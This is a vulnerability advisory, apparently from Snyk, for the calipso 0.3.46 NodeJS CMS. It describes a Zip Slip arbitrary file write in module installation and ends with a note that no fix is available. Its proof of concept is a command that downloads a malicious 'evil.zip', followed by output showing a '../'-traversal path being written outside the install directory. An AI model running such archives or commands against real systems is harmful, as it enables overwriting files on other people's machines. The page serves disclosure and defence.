calipso@0.3.46 vulnerabilities

A NodeJS CMS

Direct Vulnerabilities

Known vulnerabilities in the calipso package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Arbitrary File Write via Archive Extraction (Zip Slip)

calipso is a Calipso is a simple NodeJS content management system based on Express, Connect & Mongoose.

Affected versions of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip). It is possible for a malicious module to overwrite files on an arbitrary file system through the module install functionality.

PoC

 ✗ calipso modules download https://github.com/snoopysecurity/Public/raw/master/payloads/evil.zip
Launching calipso from: /home/snoopy/MySite
Calipso directory: /home/snoopy/.nvm/versions/node/v8.17.0/lib/node_modules/calipso/lib/../

Resolving file location, and downloading ...
(node:14850) [DEP0029] DeprecationWarning: util.error is deprecated. Use console.error instead.
Redirecting to https://raw.githubusercontent.com/snoopysecurity/Public/master/payloads/evil.zip ...

Resolving file location, and downloading ...
[0%...25%....50%....75%....100%]

Downloaded  ../../../../../../../../tmp/foo.txt 0
Downloaded  evil/.gitignore 89
Downloaded  evil/elastic.js 8757
Downloaded  evil/templates/results.html 1220
Downloaded  evil/package.json 409
Downloaded  evil/test.txt 4
Downloaded  evil/README 0
/home/snoopy/MySite/modules/downloaded/elastic/
Installing elastic via npm, output will show below (may be a small delay):

How to fix Arbitrary File Write via Archive Extraction (Zip Slip)?

There is no fixed version for calipso.

*